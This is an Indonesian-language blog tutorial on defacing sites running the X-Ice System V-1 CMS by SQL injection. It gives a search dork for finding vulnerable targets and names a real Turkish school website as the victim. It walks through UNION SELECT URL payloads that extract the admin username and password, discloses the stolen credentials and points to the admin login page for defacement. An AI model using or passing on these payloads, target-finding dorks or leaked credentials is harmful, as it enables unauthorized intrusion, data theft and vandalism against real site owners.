Deface web menggunakan SQL Injection pada X-Ice System V-1

Deface web menggunakan SQL Injection pada X-Ice System V-1


Cara mendeface website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak vulnerability dari situs-situs yang masih bisa dideface

Untuk mencari targetnya, silahkan menggunakan keyword inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.sinopagsl.k12.tr/devami.asp?id=22 (http://fasha.kokarga.com/2009/03/deface-web-menggunakan-sql-injection-pada-x-ice-system-v-1/)

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 22-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id='.
/devami.asp, line 8

Setelah ini kita akan.mencari username nya dengan mengganti angka 22 dengan

-22+union+select+0,kullaniciadi,2,3,4,5,6,7+from+ad min

kurang lebih alamat di browser seperti ini :
http://www.sinopagsl.k12.tr/devami.asp?id=-22+union+select+0,kullaniciadi,2,3,4,5,6,7+from+ad min
http://img18.imageshack.us/img18/9146/38974260ue3.jpg
sekarang kita dapatkan usernamenya adalah burhanettin

selanjutnya mencari password dengan cara mengganti angka 22 dengan

-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.sinopagsl.k12.tr/devami.asp?id=-22+union+select+0,sifre,2,3,4,5,6,7+from+admin
http://img12.imageshack.us/img12/808/49381396qr8.jpg
passwordnya adalah sagsl

Sekarang login sebagai admin
http://img19.imageshack.us/img19/4578/22901836fh7.jpg
http://www.sinopagsl.k12.tr /admin/kontrol.asp
selanjutnya terserah anda….
http://img8.imageshack.us/img8/7313/26276791ek1.jpg